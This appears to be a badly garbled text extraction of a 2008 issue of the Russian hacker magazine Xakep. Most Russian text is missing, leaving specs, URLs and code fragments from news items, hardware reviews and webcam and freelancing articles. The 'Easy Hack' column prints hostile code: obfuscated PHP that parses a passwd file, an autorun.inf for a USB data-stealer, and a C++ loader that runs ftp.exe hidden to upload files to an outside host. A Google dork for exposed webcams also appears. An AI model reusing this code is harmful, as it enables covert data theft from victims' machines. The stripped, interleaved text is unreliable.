Xakep 113

SIM-
. 116
www.xakep.ru
05 (113) 2008
web-
7
web-
. 30
.4

Oracle
. 52
. 62
TV

-
FreeBSD
. 122
. 138
>> inside

/ STEP@GAMELAND. RU/
x 11 /107/ 07
CONTENT05(113)
004
MegaNews
100
104
FERRUM
Delphi
016
110
C#
022
114
\++
024
ADSL -
ZyXEL P660HTW2 EE
PC_ZONE

116
SIMphonia
SIM
122
026
030
Web-
XAKEP.PRO
128
Longhorn
036
Windows Server 2008:
132
041
Mobile tricks
Squid:
Asus 100%
138
FreeBSD
144
BSOD
Windows Server 2003

044
Easy Hack
048
052
148
Oracle,
058
152
FAQ United
FAQ
062
156
068
158
C# A Z
8,5
074
-Tools
160
WWW2

076
080
X-Profile
084
X-Stuff

086
FreeBSD 7.0
090
PPP
PPPoE PPTP Linux
096
Linux
Intro
.
, ,
. , , -
, -
opensource-
, . -
, .
Windows
: GSM A5/1
opensource-
. 5
Skyper THC
Wordpress
HITB 2008. ,
$700 ,
. -
, .
nikitozz, . .
udalite.livejournal.com
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)

(magazone@real.xakep.ru)
UNIXOID, XAKEP.PRO PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Andrushock
(andrushock@real.xakep.ru)
>

/Art
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

(kiselev@gameland.ru)
>

>

(rodionkit@mail.ru)

(chill.gun@gmail.com)
/xakep.ru
>

(xa@real.xakep.ru)
>

(goryacheva@gameland.ru )
>

(olgaeml@gameland.ru)

(alekhina@gameland.ru)
(belov@gameland.ru)
>

(alekseeva@gameland.ru)
>

(Strekneva@gameland.ru)
/Publishing
>

(noah@gameland.ru)

(sidorovsky@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)
>

(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14 2002 .

ScanWeb, .
100 000 .
.

.
:

. ,

,
.

.

.

.
>> meganews
Meganews
Mifrill
/ mifrill@riddick.ru /
- .
22" VLED221wm
ViewSonic , HighDefinition, ,
.
118% NTSC 12000:1

70-75% .
5 , 1680 x 1050,
SRS WOW HD -
, .
,

, $700 $800, . ,
$1000 ,

:) .
$3 Silicon Alley Insider,

. Wikipedia : $7 .
Microsoft : , !
Windows .
Windows Vista , Microsoft
MSDN
.
( )... !
RoboChamps 2008
,
,
,
, . Microsoft
, ,
.
Robotics
Studio 2008,
www.robochamps.com,

. SDK- -
004
, 400 .
,

6 :
1. ;
2. ;
3. , ;
4. ,
;
5. ( );
6. ,

.
27-30 - . , MSDN Microsoft Robotics
(msdn2.microsoft.com/en-us/robotics/default.
aspx), ,
Robotics Studio 2008 .
x 05 /113/ 08
>> meganews
Imagine Cup 2008
11 , ,
Imagine
Cup (www.imaginecup.ru).

6 , 2003 ,
Microsoft, , .

( )
IT,
,
,
.

117 .
: , .
Imagine Cup.
,
, ,

(www.photocup.ru).

. 400

,
006
Arina,
.
,
,
,
.

. ..
.Life,
.

, AirRanger,
.

,
RedDevils (
, ).
Imagine Cup
.

-
Imagine Cup 2005, -
- .
x 05 /113/ 08
>> meganews
-
Vista XP
, ! , ,
SP1 Windows Vista.
,
, . -, Vista

. 80000 ,
, . ,
Vista 150 -
, Adobe, Cisco, IBM, Oracle,
Sun .
-, , . ,
.
, -
.
-, .
SP1 Vista
.
Vista .
,
, ,
, -.
, .
.
, Vista UEFI
- ExFAT.
SP1 Vista Microsoft .
, ,
SP3 XP. ,
, , SP2.
, , Vista
, Network Access Protection Windows Imaging
Component. , , Microsoft XP. SP3
.
Mobile Research Group, iPhone
500 000. . , ?
, ,
LG
. , ,
. W42 - 19", 20" 22".
8000:1, 5
LG f-ENGINE, .
, T ( W2042T),
DVI-D,
HDCP.
W00 . W2600HP W3000H,
26" 30" , , ,
, HD, 1920 1200 2560
1600. , , $1400
W2600HP $2250 W3000H.
3,6
. $3,2 .

008
x 05 /113/ 08
>> meganews

6 9
ACM ICPC,
IBM. 32 100
,
: 11 .
- 11 ,
. , 8 11 ,
. MIT , , . 5 .
700
. 2008
Wikipedia
.
Sun Tech Days
-, ,
Sun Tech Days. , 10
Sun Microsystems ,
, , Solaris Java.
Debian GNU/Linux - Sun Microsystems
010
(Ian Murdock), (Rich Green)

- Sun Microsystems,
, . 2008
JavaFX, Solaris, GlassFish, JavaSE7, OpenJDK .
72 6 -.

www.developers.sun.ru/techdays.
x 05 /113/ 08
>> meganews

- A1
. ,
A-ONE. , ,
, WAP-,
. A-ONE
,
, ,
. , ,
MMS
A-ONE .
:
-
(40%)
5%
- 0.
.
GPS

(GPS)

,
.

.
, 2025
GPS .
? !
GPS jammer,
, . , , ,
!
, GPS- ,
.
GPS,
, 5 . , GPS (
)
, 265$, ?
torrent-
BitTorrent ! !
!,
- demonoid.
com. :
9
. ,
, . ,
, -, Colocall. ,
,
, . ( )
.
The Pirate Bay ,
.
. The Pirate
Bay . Baywords
(baywords.com) ,
, ,
.
Capture The
Flag
26 28 ()

Capture The Flag, 9 .
,
.

.
www.
rustf.org.
012
x 05 /113/ 08
>> meganews
HITB?

HITB,
THC ,
.
, , ,
. ,
,
A51. ,

GSM. .
, , $1000,
SMS,
! , ,
.
Nokia 3310
USPR (Universal Software Radio Peripheral) , - ,
. ,
, . ,
- .
blog.thc.
org, , .

VoIP, - ,
.
,
.
. Wi-Fi
Wi-Max, .

VoIP-,
? ? , . ,
Skype
. 24
, Java. 50 Nokia, Motorola,
Samsung Sony Ericsson, - ,
,
SkypeIN.
Skype / Skype
Out .
: GPRS- ,
.
, GSM.
, , , , , .
x 05 /113/ 08
13
>> meganews
, , -,
, :).

.
NTT,
, Firmo.
-, .
, .

, .
230 /c,
, RedTraction,
, 10 /c.
$8000 , 5
.
, . ,
,
, , :).
PayPal
PayPal . ,
.
PayPal,
, ,
. , ,
, -
,
.
,

,
EV SSL (
SSL

).
.

.
. ,
, ,
.
014
x 05 /113/ 08
>> meganews
393 30 , .
, ? :)
Hack in the Box

14 17 IT-
Hack in the Box 2008
. , , HITB
,
. .

,
IT-. :
1. GSM A5/1,
GSM . SMS .
x 05 /113/ 08
2. VSAT , Rogue AP Wi-Fi,

Man-in-the-Middle . ,
SAT-.
3. VoIP IP-.
4. Embedded ,
SOHO-, : , Wi-Fi , ADSL, ..
,
, .
15
>> ferrum
, , ,
. ,
, .
, , ,
. ,
.
. ,
5-10
,
.

. ,
8
90%. .
, .
20 - Wi-Fi
,
.
. Battery Eater05 1.0 . ,
,
3D -
. ,
, , .
, , 186 230 .
,
, .
,
. ,
. ,
,
.

,
. ,
, 0 260 . ,
.
,
Ippon Back Verso
400
Ippon Back Comfo
Pro 600
CyberPower Value
800E
:
: Intel Core 2 Duo E6850
: Zalman CNPS9700
: ASUS P5K-E
: 2 x 1024 , Kingston DDR2, PC-8000, 1000
: 512 , Chaintech GeForce 8800GT
: 400 , Western Digital 4000AAJS 7200 /, 8
: 580 , Hiper HPU-4M580
: 21", Samsung 215TW
: USB
: PS/2
3.5":
5.25": ASUS DRW-1814BLT
016
CyberPower Value
600E
APC BE700RS
000
APC BE550RS
00:00 01:00 02:00 03:00 04:00 05:00 06:00 07:00 08:00 09:00 10:00 11:00
test_lab
(.(495) 739-0959, www.merlion.ru),
CyberPower APC
x 05 /113/ 08
>> ferrum
ST BUY
ICE
TORs
TO
s CHOICE
ST BUY
EDI
EDI
HO
BE
BEST BUY
BE
2400 .
2600 .
APC BE550RS
:
, : 550
, : 330
: 180-266
:
4 , 4
: 16
: 4
: USB, RS-232
: /
, : 230 x 86 x 285
, : 6.4
. - ,
. , barebone-,
, , .
.
, .
.
, .
APC BE550RS
, . 330 .
, ,
100 ,
? 6
.
, .
, 140
.
/ , ,
, . . :
.
x 05 /113/ 08
APC BE700RS
:
, : 700
, : 405
: 180-266
:
4 , 4
: 16
: USB, RS-232
: /
, : 230 x 86 x 285
, : 6.8

. , 405 ( 330
). , APC BE700RS
:
8,5 , ,
(, Photoshop) .
,
.
, . PowerChute Personal :
, , .

. , ,
.
, .
, ,
205
( 180 ). ,
,
, ,
.
, , . ,
.
017
>> ferrum
2000 .
CyberPower Value 800E

:
1300 .
, : 800
, : 480
: 165-270
:
3
: 8
: USB, RS-232
:
, : 100x140x320
, : 6.1
CyberPower Value 600E

:
, : 600
, : 360
: 165-270
:
3
: 8
: USB, RS-232
:
, : 100x140x320
, : 5.3
, ,

.

.
.

RS-232, USB.

165 . CyberPower Value 600E
6 .
,
. ,
,
? ,
, .
1000 .
8 , .
, , , ,
,
, ,
.
, , ,
30 . ,
, .

018
, ,
.
10 . ! ,
, .
.
, , .
,
, . ,
. 165 .
, . PowerPanel Personal Edition .
,
.

(, DSL-, ).
,
.
Ippon Back Verso

400
Ippon Back Comfo
Pro 600
CyberPower Value
800E
CyberPower Value
600E
000
APC BE700RS
APC BE550RS
0
50
100
150
200
250
300
x 05 /113/ 08
>> ferrum
ST BUY
BE
BEST BUY
BE
ST BUY
1900 ..
1200 .
Ippon Back Comfo Pro 600

:
, : 600
, : 360
: 154-264
:
4 , 2
: 8
: USB, RS-232
: /
, : 300 x 124 x 210
, : 7
, , .
, . ,
,
. , ,
.
,
. DSL- , . ,
, .
165 .
.
, COM- USB
. . .
, java.
Java . , - - ,
. ,
, . , ,
,
.

APC BE700RS .
,
020
Ippon Back Verso 400

:
, : 400
, : 200
: 154-264
:
4 , 2
: 8
: USB, RS-232
: /
, : 124 x 166 x 202
, : 3.3
. barebone, , , .
200 ,
, . , , .
Ippon back Verso 400 154 ,
. ,
USB COM-. , , java
. , , , . , ,
? Ippon back Verso 400
3,5 .
8 . , ,
, . ,
,
, .
, , : , ?
,
, .
. Ippon Back
Verso 400 , .
, ,
.z
x 05 /113/ 08
Sennheiser PC 131
VOIP-
PC 131
, ,
, .
. ,
, Sennheiser ,
- ,
!

,

.
,
.

.
.......... 30 18 000
............. 32
.......118
............... 3
............... 80 Hz 15 000
.........(-) 38 dBV/Pa
.............2 k

Sennheiser :
1. . Skype (www.
skype.com) Gizmo (www.gizmoproject.com).
, ! ,
, .
, .
2. 5 ,
. : ,
,
TeamSpeak (www.goteamspeak.com)
. !
3. - .
DFX (www.fxsound.
com).

.
>> ferrum
4
4000 .
2700 .
Brother HL-2140R

Creative I-Trigue 3000

: 2400 x 600 /
: 181
: 8
: USB 2.0
GDI
: 250
: 368 x 361 x 170
: 5,8
:6 RMS (2 )
12 RMS ()
: 40 ~ 20

: Line in ( ) 3,5
/

1. , ,
1. .
2.
.
2.
USB, .
3. .
4. 250
.
5. 8 .
6. 35 .
7. ,
( ).
8. :
, , . .
.
3.
, .
4.
.
5.
.
6. .
7. mini-jack.
.
1.
.
2.
1.
, .
022
(,
).
x 05 /113/ 08
>> ferrum
900 .
700 .
Genius Navigator
365 Laser
-
Genius
Traveler 350

: USB
: 800/1600 dpi
:
: 2
: , 8 , /
Clear
: -
1. .
2. 800 1600 Dpi.
:
: USB
: 2 , 2
: -
, !
3. - ,
.
4. .
5. .
6. USB .
7. .
1. , ,
.
2.
.
3.
.
4. ,
.
1. ,
.
2. , , .
3. .
test_lab
Genius, Creative Brother
x 05 /113/ 08
5.
. .
6.
, .
1. .
2. , , (
, ).
3.
.
023
>> ferrum
2600 .

ADSL - ZyXEL
P660HTW2 EE
ST BUY
BE
ST BUY
BEST BUY
BE
ADSL, - , , , , ,
, , , Annex-. .
,
,
? ZyXEL
- P660HTW2 ADSL2+.

ADSL- (, , Absolute ADSL, , -, ), Wi-Fi ,

. ,
024
, ,
WPA2PSK.
NetFriend. ,
zyxel.ru, .
ADSL-, , .
- :
,
1 3,5 Annex M
7 Annex L.
, ,
x 05 /113/ 08
>> ferrum
ZyXEL NetFriend:

IPTV, .
NetFriend , . , -
(NAT),
,
. DynDNS,

.
ZyXEL NetFriend:

1 RJ-11
4 RJ-45 ETHERNET (10BASE-T/100BASE-TX)

ADSL2+ (G.992.5)
Annex A, Annex B, Annex M, Annex L (RE
ADSL)
SIP (SIP ALG)
VPN- (IPSec, PPTP, L2TP), PPPoE
802.11 b/g
: IEEE 802.1x / WPA /
WPA-PSK / WPA2 / WPA2PSK
WEP- 64/128/256
: (SPI)
DoS- DDoS-

: NetFriend, -, TELNET,
SNMP, FTP/TFTP
:180 x 128 x 36
: 350
x 05 /113/ 08
, P660HTW

, -
.
. ZyXEL P660HTW2 Wi-Fi. ,
,
-. :
, 90 /.
15-30%. 90-100%.

- ,
( ,
, ), , .
- , NetFriend
,
. , .
, , ,
- ?
ZyXEL P660HTW2 EE . z
Absolute ADSL
Absolute ADSL,
- ZyXEL, : ,
, / ADSL2+,
Annex A Annex B. ,
- ,
-
ISDN. :
,
( Annex L), ,
1 / 3,5
/. , ZyXEL, , NetFriend.

.
025
>> pc_zone

. www.virustotal.com
, . ,
.

,
(
),
.
www.virustotal.com.
. , (www.
viruslist.com/en/weblog), virus-total,
,
. , ,
rootkit ,
, , virus-total,
, /
API-, .
,
. ,
, , -
026
virus-total .
? virus-total ,
,
- ( , !).
,
( )
,
. , , ,
, ,
.
, , . ,
.
, , $2000 . -
, , .
Core2Duo
.
x 05 /113/ 08
>> pc_zone
, , .
(, Perl, PHP) CGI (
, CGIC).
. ,
. rich- plain-,
!
Virus-total
info
Virus-total , .
,

,
(pipe).
? , , /,
( ,
).
Perl,
, -
, (,
).
, , virus-total
. : -,
, , , , ,
GUI-. ,
virus-total
virus-total.
, ( GUI-
)
log-
, , DDE
(Dynamic Data Exchange), GUI- .
, log, , .

,
HTML- ,
.
, ,
Windows- (Windows Message
, , WM). WM-
, ,
, ,
PDF ,
,
,
. x 05 /113/ 08

.
. . ,

, , Windows .
,
, , ,
. ,
,
. :

. ,

( ),
rescan;
CRC32
, (
),
,
4 , . CRC32 ,
MD5 . :
, ,
CRC32 MD5 (

), CRC32 (
) , ,
MD5 ? ,
;
(
)

Microsoft, -
,
?!
,
?
( )
- . :
,
,
, .
,
,
.

,
. ,
,
,
,
(
,

).
- , ,
,
, ,
.
, virustotal.com,

.

.

(

),

.

][.
warning

.
, ,

, ,

(
)
.
027
>> pc_zone
PEiD, /

, Microsoft, ,
?!
, (
virustotal).
,

( ), ,
/, . ,
( )
,
. ?
,
. ( )
( ), -
: , IP ( IP,
IP , IP ). zip

. , ,
, .
, , .
,
- ,
GUI- , , ,
. . ! , :

, ,
,
. , ,
.
, , ,
( virus-total), TCP/IP
,
, .
( virus-total)
, -
, ? ,
028
virustotal.
,

(EULA)
, - .
, . !
!

, , , . ,
,
. . , .
? , , ,
.
. , , ,

.
,
, !
, .
,
( ) , , , .
x 05 /113/ 08
>> pc_zone
, . ,
TCP/IP
ID ,
, , ,
, .
e-mail .
PEiD,
/ (,
). , ,
. 99%
, ,
,
,
. , ,
, -
.

.
, , -.
.
XSafe ,
MS-DOS
. , , ,
, , , ,
- ..
, , , , ,
,
. .
,
. , ,
, ,
$1 ( ). , ,
, , , ,
.
.

? , !
. ,
. ,
() . ,
. IT- , ,
- SMS
(
, , ). ,
,
, ,
( ) . ,
, .
- SMS. , 150 , 450,
.
?

/ . (

)
x 05 /113/ 08
, , , . , ,
. z
029
>> pc_zone
STEp
/ step@gameland.ru /
Web-
c -
. . ...
. , - ?
-
. , ,
.
1.
DozoR (www.dzzzr.ru)
Wi-Fi .
: . , ,
3000 ., . ,
030
,
. ,
. Wi-Fi ,
? Windows Mobile,
. WebCamera Plus (www.ateksoft.com)
: ,
( ). Wi-Fi, Bluetooth GPRS ( ,
) -. x 05 /113/ 08
>> pc_zone
links
,

: www.instructables.
com/id/Making-aNight-Vision-Webcam.

pages.cpsc.ucalgary.
ca/~hanlen/vision/
facelinks.html
: Wi-Fi IP-
IP- , . ,

. ,
Skype, Virtual Dub
, ,
! WebCamera Plus
.
:).
,
(
USB). ,
-. ,
. Symbian
, .
Wi-Fi, Mobiola Webcam (www.
warelex.com) USB Bluetooth,
Symbian S60 UIQ.
Nokia,
Sony Ericcson.
Java :
Mobiola Webcam Lite. , ,
Bluetooth.
info
WebCamera Plus

,

.
Wi-Fi
, ,
,
, ,
1500 .

TV.
,
.
2.

( , ),
.
.

,
? !
Webcam Zone Trigger (www.zonetrigger.com).
, ,
- ( ), . ,
,
.
. - (, , ,
), .

. , x 05 /113/ 08
, Webcam Zone
Trigger
.
email/SMS- - HTTP-. , .
, , . ,

DV-, TV-,
IP-.
UVScreenCamera
(www.uvsoftium.ru)
,
-
. ,
,
:).
3. ,

, !
. , , ,
- . ,
031
>> pc_zone
Camera Mouse 2008 c , ,
. , - - ! ,
:). ,
BioLogin (www.idiap.ch/biologin).
, ,
!
4. !
.
,
. , Lemon Screan
-. ,
, ,
. .
: LemonScreen
(www.keylemon.com) , , .
.
Enrollment. , , , . ,
. .
(Face detection confidence) .
(
), Update model
. ,
. ,
, - .
60 - , LemonScreen
. - . , .

! , , . , ,
. , LemonScreen . ,
. ,
032
,
. , - ,
, . , ,

. : (
, ,
). ,
, !
, - Camera Mouse
(www.cameramouse.org) .
,
. -
( , , ),
. . <Numlock> :
, !
: ( ),
. :
! , ,
.
!
5. !
,
( ).
,
,
, .
YouTube.com, ,
. HandVu (www.movesinstitute.org/~kolsch/HandVu/
HandVu.html) . ,
OpenCV, . - , ,
2006 , ,
.
HandVu, .
. Hand Gesture Interface (www.cmpe.boun.edu.tr/~keskinc)
x 05 /113/ 08
>> pc_zone
info
Hand Gesture Interface

, . ,
:
,
. ,
.
: .
: ,
. ,
,
.
6.
, - ,
, , , ,
- . , , ,
.
- - .
,
Mando (sourceforge.net/projects/mando).
- ,
,
,

Wi-Fi
, , .
wireless-
, , .
,
, , .
, WEP-
.
,

(IV) . x 05 /113/ 08
. , , ,
. , ,
,
. Pointand-click . (
- ) Mando ,

KDE. :

.
,

OpenCV (sourceforge.
net/projects/
opencvlibrary),

.

.
tar xjf mando-1.6.tar.bz2

cd mando-1.6
./configure
make
./mando
. :
. , : ?!
7.

, -

:
channel
channel
channel
channel
A
B
C
D
=
=
=
=
2,411
2,434
2,453
2,473

hauditor (itdefence.ru/content/product_news/irat),
web- , , . ,
.
, - - Google. ,
: url:/view/index.
shtml inurl:ViewerFrame?Mode=.
033
>> pc_zone
webcamXP ,
, .
webcamXP (www.webcamxp.com) - - .
.
,
, . webcamXP
.
, :
Java, Javascript Flash.
.
,
. .
Active WebCam (www.pysoft.com).
, .
web-, - ( , TV
) 30 .
,
, . ,
. Active
WebCam .
, , . , - , NAT
, Skype (www.skype.com)
. (Tools Options
Video) ,
. z

RC- ,
, ( LEGO,
), .
-! ,
, ,
. , ,
. :
RoboRealm
(www.roborealm.com). , ,
. -, ,
, (www.roboforum.ru)
(roborealm.narod.ru) .
034
, .
x 05 /113/ 08
>> pc_zone

, . ,
. - ,
. , ,
.
!
,
: . .
, : ,
.
IT. . . - ,
. ,
036
. ( )
,
, , , .
,
, .
: ,
, , . , , .
x 05 /113/ 08
>> pc_zone
PHP : . , 3 ,
, ,
.

, .
, ,
:
- .
.
?

, , , . , -
,
. ,
. , ,
, .
. ,
. ( , ) ,
. ,
,

. ,
. , , .
, ,
,
, , , .
?
: - ? e-mail,
, , .
,
, -.
, ,
-
. , free-lance.ru weblancer.
net ( ). , www.
getafreelancer.com ( GAF). :
, , , , . ,
, ,
www.getafreelancer.com ( ).
,
, Sign Up.
: e-mail,
.
,
, (,
XML, PHP, JavaScript), .
, , .
x 05 /113/ 08

() , : ++, XML, Flash, OS.
: , ,
, -. , GAF
.
, ,
: (, ),
. ,
, ,
.
.
, , .
.
, ,

. , .
,
, , !
. ,
Gold membership.
12 . ,
.
, Gold membership . ,
,
. Gold membership , ,
!
, ,
, ,
,
( ,
). , ,
info

,

,
,
.
,
. ,

.
www.
getafreelancer.com

rentacoder.com.

,

.
elance.com.

, , :
Fedora 6 Postfix, Courier,
Mysql, Postfix, Fedora 6 (100$);
- (300$);
4 (100$);
2000 c Perl Java (2000$);
- (4500$).
037
>> pc_zone
GetAFreelancer

. , ,
,
( , ). , ( Gold membership) ,
,
. ,

, , , ,
.
, - !
, -
Please check PM (, ),
GAF.
,
. , ,
. .
C++,
.
: 90% , ,
. ,
weblancer.net. ,
2003 .
. -.
,
.
www.free-lancers.net. , ( 1%),

( -).
freelance.ru.
.
,
.
PHP, MySQL Perl.
free-lance.ru. ,
:
. : -, ,
, Pro.
038
,
.
,
Project Bid Won, Frozen.
.
www.getafreelancer.com Project begins,
e-mail . Closed.
Gold membership,
(10%, $5). ,
. . ,
! ,
escrow- ( ).
. , , . ,
. . , ,
. .

: ?
, ,
$1k $3k, -
. $10k
. - $100
$500. ,
: . ?
( , ),
OpenRCE.
org, .
,
: ,
Microsoft: , .
, ,
, -
. ,
- .
,
.
,
, ...
x 05 /113/ 08
www.Xakep.ru

@xakep.ru
>> pc_zone
GetACoder.com , !

, ,
GAF. : PayPal,
Moneybookers, , E-Gold
. , PayPal -
,
. . , , E-Gold 5%.
E-Gold $30, $250 .
, 45 ( ). ,
, , ,
. , E-Gold Webmoney.
,
.
.
, E-Gold.
GAF ( -
). , , GAF:
.

. , . , .
Porsche Cayenne,
. ,
, . ,
. z
escrow?
GAF
escrow-, . ,
, (escrow release).
escrow-
(
).
www.getafreelancer.com. escrow
.
040
x 05 /113/ 08

ASUS Trend Club ,
. 5
, Trend Club: , ,
, .
* www.asusTC.ru.
| ,
| c
| ,
* : , MAXI tuning, , , , .
| | | |
SMART
tricks
Asus 100%
Asus P750
: Marvell PXA270 520
: 64 RAM, 256 Flash ROM
: 2.6,
240x320, , , 65536
: microSD (TransFlash),
microSDHC, SDIO
: EDGE, HSDPA, Wi-Fi,
802.11b/g, Bluetooth 2.0
: Li-Ion 1300
: Microsoft Windows
Mobile 6.0 Pro
GPS: SiRFStar III,
3.1
: 58x113x17
: 130
, Asus.
, ,
. ,
.

, . , :
,
,
. Asus: Asus P750. 520 , , 64
, Bluetooth, Wi-Fi, GPS
, - .
, , .
Windows Mobile,
Asus , . , , , ,
SDK, .
,
042
.
.
,
,
.
, .

.

.
?
,
xRay PDAFinder.

SIM-, SMS
. :
, IMSI- SIM-, IMEI , ,
.

/ .
.
Hard Reset,

.
. , ,
: 4pda.ru/forum/index.
php?showtopic=58768&st=0.
,
WM_HIBERNATE.
,
:
, .
,
x 05 /113/ 08

:
-:

|
.
|
.

|
. ASUS P5E3 Premium /WiFi-AP @n Edition
| Maxi Tuning |
| |
,
?
, ,
.

( ),
.
Oxios
Memory (www.oxios.com). ,
,

,
, ,
.
Wi-Fi
,

Netstumbler
?
: Asus P750 ,

.
,
, :).
, -
! , .

WiFiFoFum (www.
aspecto-software.com). Asus GPS,

: .
, KML-,
Google Earth
, !
, ,
.
?
,
.

. (mobile.yandex.ru/maps).
x 05 /113/ 08
,
.
:

, , ,
,
.
,
?
, !
. ,

.
,
.
, ,

,
40 /.
!
,
GPRS- . , ,
..
.
,

,

!
? ! toonel.net

.

,

: 127.0.0.1:8080.

,
. ,
,
, !
,

.

VNC Viewer for PocketPC (home.utah.
edu/~mcm5849/wince/vnc.html).
,
: Vista,
Ubuntu Linux - .
,
, Real VNC,
, Mac.

-
SSH. ,

PuTTY
PocketPuTTY (www.pocketputty.net).
:
,
.
.
,
, ,
. ,
.
, , , ?
! ? !
, Wi-Fi,
.
4Talk (www.4pockets.com)
Wi-Fi
Bluetooth.

(.. ,
), (
).

!
,
.
043
>>
Easy Hack}
Dot.err
Cr@wler
R0id
Skvoznoy
/ kaifoflife@bk.ru /
/ crawlerhack@rambler.ru /
/ r0id@mail.ru /
/ furyhawk@rambler.ru /
1
: PHP ,
:
/ .
:
. , PHP . .
1. PHP :
, ,
. ( ) . 70% (
, ). , :).
4. :
$GLOBALS['
']="\x66\x6F\x70\x65\x6E";
$GLOBALS['
']="\x66\x65\x6F\x66";
$GLOBALS['
']="\x66\x67\x65\x74\x73";
$GLOBALS['
']="\x73\x74\x72\x72\x65\x76";
$GLOBALS['
']="\x73\x75\x62\x73\x74\x72";
$GLOBALS['
$fn=fopen("E:\passwd.txt","r");
if(!$fn) { echo("Cant open passwd.txt");} else {
while(!feof($fn)) {
$np=fgets($fn);
$str=strrev($np);
$login=substr(strrchr($str,":"),1);
$rev=strrev($login);
$fp=fopen("E:\logins.txt","a");
fputs($fp,"$rev\n");
fclose($fp);
} fclose($fn);
}
']=\x73\x74\x72\x72\x63\x68\x72";
$GLOBALS['
']="\x66\x70\x75\x74\x73";
$GLOBALS['
$
']="\x66\x63\x6C\x6F\x73\x65";
=$GLOBALS['
if(!$
']("E:\passwd.txt","r");
) { echo("Cant open passwd.txt"); } else {
while(!$GLOBALS['
$
$
$
$
$
=$GLOBALS['
']($
)) {
']($
);
=$GLOBALS['
]($
=$GLOBALS['
=$GLOBALS['
']($
=$GLOBALS['
$GLOBALS['
$GLOBALS['
);
']($GLOBALS['
']($
,":"),1);
);
']("E:\logins.txt","a");
']($
,"$
']($
\n");
);
, ,
passwd-.
2. http://taran.su/abf/ .
GO.
3. . : PHPabf beta v0.1
PHP .
:

:
.
, -.
. , . .
1. USBThief,
DVD.
2. :
batexe
044
$GLOBALS['
']($
);
5. .
5. ,
.
icons
Dump
nircmd.exe
autorun.inf
3. , :
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.
bat
4. . ,
.
.
x 05 /113/ 08
>>
5. , :
IM-

/

, , , etc

,
/Dump . ,
. , ,
, /.
while(!feof($site_fd))
{
$str = "";
$str = fgets($site_fd, 1024);
if (preg_match($mask, $str, $ip))
{
echo $ip[0] . " ";
}
}
:
:
- . .
-,
. -. ( ).
.
1. proxygrabber.php:
}
}
2. _3lf - - ( DVD).
3. , -set_time_limit(0);
( ) Start.
:
if(!isset($_POST['filename'])) { exit(0); }
$mask = '/[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[09]{1,3}:[0-9]+/';

$fd = fopen($_POST['filename'], "rt") or die("Cant open
file");
$site_list = explode("\n", fread($fd, 9999));
foreach ($site_list as $site)
{
if ( ($site_fd = fopen($site, "rt")) !== false)
{
4
: loader ++
:
ftp
ftp.exe. ++.
,
( , ,
-) .
, .
1. ftp.exe :
( IP) . , .
com_file X:\WINDOWS\ftp_commands:
http://www.site.com/list1.html
http://www.site2.com/list1.html
4. , . .
, , . ,
:).
. , com_file:
char param[128];
strcpy(param, "-s:");
strcat(param, com_file);
strcat(param, " ");
strcat(param, "my-host.com");
param : -s:X:\WINDOWS\ftp_
commands my-host.com.
2. . ,
. : , ftp-.

char com_file[256];
char m_dir[256];
GetWindowsDirectory(m_dir,sizeof(m_dir));
strcpy(com_file, m_dir);
strcat(com_file,"\\ftp_commands");
,
(\\) . ,
x 05 /113/ 08
045
>>
ofstream of(com_file); of<<"mylogin"<<endl;
of<<"mypass"<<endl; of<<"cd WWW"<<endl; of<<"send " <<
"D:\\WINDOWS\\regedit.exe" << " " << "regedit.exe" <<
endl; of<<"quit"; of.close();
. cd <_>
( ). send (send <_> <__
>) .
quit - .
5
:

:
, ,
.
.
1. ,
. ,
. ,
ShadowUser Pro. ,
,
( ).
2. Configuration . (Volumes)
,
. ,
, All
Volumes. -

.
3. (Exclusion List)
, . (, , ),

. , .
4. , ,
ShadowMode. Mode
Activate. ,
. .
3. ShellExecute() ftp.exe.
-,
. , SW_HIDE ftp.exe
. :
ShellExecute(0 ,NULL, "ftp", param, NULL, SW_HIDE);
. , , ftp-.
, ShadowMode (
Options Wallpaper).
. :
// ;
;
/ ;
msconfig;
;
;
, ;

? .
ShadowUser ShadowMode, Lose_All_
Changes . ,
ShadowMode. ? :).
ShadowUser Pro
6
:

:
,
. , , , . , OllyDbg (
<F7> <F8>)
. ,
- .
? ,
.
:
046
x 05 /113/ 08
>>
CMP 1, 2;
[__] ;

:
je, jle, jz, jnz. ,

(
CMP). , , ,
, ( ,
EIP
).

, .
.
1. ,
(<F2> OllyDbg).
2. (<F9>).
3. (<F7> <F8>).
:
Excel
:
, , . ,
,
() ,
( , ).
, :
,
.

, Microsoft Excel.
1. Excel.
, VBA-. ,
, .
2.
, PortScan.
3. (
DVD).
( , ), , , ,
... -.
4. ,
. .
(xakep.
ru/post/22983/default.asp).
8
:
:
domainsdb . , ,
.
Google- (http://groups.google.com). ,
Google .
.
. , :
x 05 /113/ 08
FTP- :)
1. Python .
2. , Google- ,
... ! ,
(, , DVD).
3. :).z
047
>>
.
,
.
, , , . ,
.
01
Microsoft
Windows
DNS-
>> Brief
Microsoft
, Windows
. DNS--
Microsoft
!

1989
DNS-, ,
,
. DNS-

, -
048
DNS-
( )
.
(poisoned DNSserver) , ,

www.intel.com,
,
.
DNS-
,
DNS-, ,

DNS-
.
DNS- -
.
IP- DNS-, UDP-
16 TXID
(Transaction ID).

NT ,
Microsoft 2004
, W2K SP4
XP SP2. , ,
... Amit Klein ( Trusteer),
Alla Berzroutchko ( Scanit)
Roy Arends ( Nominet
UK), ,
Windows
. Amit Klein

Microsoft Windows DNS
Stub Resolver Cache Poisoning proof-ofconcept exploit: http://www.trusteer.
com/docs/Microsoft_Windows_
resolver_DNS_cache_poisoning.pdf.
,
